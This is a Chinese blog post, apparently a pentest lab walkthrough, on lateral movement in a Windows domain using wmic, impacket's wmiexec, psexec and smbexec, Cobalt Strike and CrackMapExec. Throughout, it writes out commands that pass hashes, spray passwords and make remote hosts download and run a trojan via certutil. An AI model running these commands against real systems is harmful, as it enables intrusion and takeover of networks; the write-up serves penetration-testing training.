当前位置: 首页 > news >正文

第129天:内网安全-横向移动WmiSmbCrackMapExecProxyChainsImpacket

这里这个环境继续上一篇文章搭建的环境

案例一: 域横向移动-WMI-自带&命令&套件&插件

首先上线win2008

首先提权到system权限

wmic是windows自带的命令,可以通过135端口进行连接利用,只支持明文方式,优点是不用上传别的东西,缺点是无回显。

利用system权限抓取明文密码和hash密码

直接获得了域控管理员的账号密码

探测存活主机 

进一步的信息收集上一篇文章写过

win2008开启监听并生成木马上传到本地web服务器

wmic 

利用wmic命令去连接别的主机,让目标主机去下载木马

wmic /node:目标ip /user:账号 /password:密码 process call create "执行命令"
wmic /node:192.168.3.30 /user:administrator /password:admin@123 process call create "certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe"

连接成功一般只有这种显示

成功上传

让他执行

成功上线

缺点就是没有任何回显

cscript

项目地址:https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs

特点是会反弹一个新的窗口就导致没有办法在cs当中去运行,类似反弹shell,并且得借助一个vbs文件,且不支持hash

在3.20(win2008主机)上运行

cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com

弹过来的新窗口反弹的ip为3.30

wmiexec-impacket

下载地址

1、Py版:https://github.com/SecureAuthCorp/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 “ver”
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”

2、Exe版:https://gitee.com/RichChigga/impacket-examples-windows

这种方式又拥有回显,又可以适配cs

生成代理节点

这里因为我是linux环境直接执行py文件,exe文件一个原理

wmiexec ./账号:密码@ip "命令"
wmiexec 域名/账号:密码@ip "命令"
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

尝试使用域控的hash进行连接

wmiexec -hashes :hash值 (域名或者.)/账号@192.168.3.40 "whoami"

执行上线

proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator@192.168.3.40 "certutil -urlcache -split -f h c:/222.exe & c:/222.exe"

案例二:  域横向移动-SMB-自带&命令&套件&插件

利用的是smb开放的445端口

命令

项目地址:PsTools - Sysinternals | Microsoft Learn

psexe也是反弹一个cmd所以不能直接在cs当中运行

windows官方用法
psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

这里因为我是linux系统所以我直接把文件拖入win2008进行运行,并且运行该文件的时候cmd权限必须为admin,这里也可以用socks代理执行,并且权限已经是system可以执行。

20执行获得30的cmd

套件

使用套件中的psexec

wmi套件中
psexec.py ./administrator:123.com@192.168.3.30
psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.30

套件当中还有一个smbexec.py文件

python smbexec.py ./administrator:123.com@192.168.3.40 
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30  

同样也是会弹出一个新的cmd会话

 

cs自带

先需要设置转发上线,因为内网不出网

选择域控密码,或者主机密码

域控上线

 利用psexec64+主机hash值上线win7

因为这里我所有主机都是一个密码,所以直接选这个,记得他会自动加上win2008的域,记得删除,然后就是提醒我们在内网渗透过程当中要尝试切换域内用户的登录方式,大部分会自动加上域

成功上线

案例三: 域横向移动-工具-Proxychains&CrackMapExec

这里proxychains我一直在用,不做过多介绍了

crackmapexec下载地址:(kali自带)GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks

基本用法

探测存活主机

crackmapexec smb 192.168.3.10-40 #探测存活主机

密码喷射域登录

crackmapexec smb 192.168.3.10-40 -u jie -p 123.com

这里由于我没有把密码和主机进行绑定,所以域内所有主机都可以用这个密码登录

密码喷射本地登录

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth

密码喷射本地登录加执行命令

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x "whoami"

尝试上线,记得设置转发上线,ip需要设置为内网ip

 利用下面的命令下载web服务器中的木马,并尝试运行上线

crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x "certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe & c:/zzzzz.exe"

 除了域控主机之外都上线了,切换域控密码喷射

高阶玩法

当收集到一台域内主机以后,可以尝试把收集到的密码,用户都写入字典当中

注意收集用户的时候不能用提权的账户,需要用域内账户

这里密码我基本上都是123.com

运行,这里注意要加一个参数,不然运行一个成功匹配后就不会继续往下运行

--continue-on-success

用字典密码去匹配

这个加continue参数好像只能够匹配密码,不能全上线,不加参数的话又指挥上线一个就掉了,不太懂了,可以匹配出来密码,用账号密码,一个一个去上线?

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • SOPHGO算能科技BM1684盒子占用空间满的问题解决
  • AI大模型加持的新一代网络舆情系统——“速途观澜”舆情感知引擎发布上线
  • Hadoop的streamingAPI与MapReduce[Python]
  • 使用 NumPy 生成随机数:一个全面的指南
  • ASC格式的协议数据解析
  • 使用Anaconda安装多个版本的Python并与Pycharm进行对接
  • 为企业创建智能支持 AI 代理
  • RTOS(8)信号量和互斥量
  • “Apple Intelligence”的“系统提示词”被曝光了
  • 【环绕字符串中唯一的子字符串】python刷题记录
  • 数据结构(java实现)——优先级队列,堆
  • NSSCTF练习记录:[SWPUCTF 2021 新生赛]include
  • actual combat 45 分布式事务seata,若依cloud项目Test,xid为null
  • 编译和汇编的区别
  • C++ 异常处理:深入解析与实践应用
  • 《深入 React 技术栈》
  • 「译」Node.js Streams 基础
  • 【RocksDB】TransactionDB源码分析
  • ABAP的include关键字,Java的import, C的include和C4C ABSL 的import比较
  • Android系统模拟器绘制实现概述
  • Docker入门(二) - Dockerfile
  • pdf文件如何在线转换为jpg图片
  • Spring技术内幕笔记(2):Spring MVC 与 Web
  • TiDB 源码阅读系列文章(十)Chunk 和执行框架简介
  • webgl (原生)基础入门指南【一】
  • 大快搜索数据爬虫技术实例安装教学篇
  • 反思总结然后整装待发
  • 记一次删除Git记录中的大文件的过程
  • 每个JavaScript开发人员应阅读的书【1】 - JavaScript: The Good Parts
  • 世界编程语言排行榜2008年06月(ActionScript 挺进20强)
  • 温故知新之javascript面向对象
  • 我的业余项目总结
  • 小李飞刀:SQL题目刷起来!
  • 小试R空间处理新库sf
  • 看到一个关于网页设计的文章分享过来!大家看看!
  • mysql 慢查询分析工具:pt-query-digest 在mac 上的安装使用 ...
  • 没有任何编程基础可以直接学习python语言吗?学会后能够做什么? ...
  • #java学习笔记(面向对象)----(未完结)
  • (1)Map集合 (2)异常机制 (3)File类 (4)I/O流
  • (175)FPGA门控时钟技术
  • (2020)Java后端开发----(面试题和笔试题)
  • (C语言)fgets与fputs函数详解
  • (Mac上)使用Python进行matplotlib 画图时,中文显示不出来
  • (分布式缓存)Redis分片集群
  • (附源码)springboot金融新闻信息服务系统 毕业设计651450
  • (附源码)springboot掌上博客系统 毕业设计063131
  • (个人笔记质量不佳)SQL 左连接、右连接、内连接的区别
  • (四)activit5.23.0修复跟踪高亮显示BUG
  • (完整代码)R语言中利用SVM-RFE机器学习算法筛选关键因子
  • (转)EOS中账户、钱包和密钥的关系
  • *(长期更新)软考网络工程师学习笔记——Section 22 无线局域网
  • .NET Core实战项目之CMS 第十二章 开发篇-Dapper封装CURD及仓储代码生成器实现
  • .net dataexcel winform控件 更新 日志
  • .net on S60 ---- Net60 1.1发布 支持VS2008以及新的特性
  • .net 调用php,php 调用.net com组件 --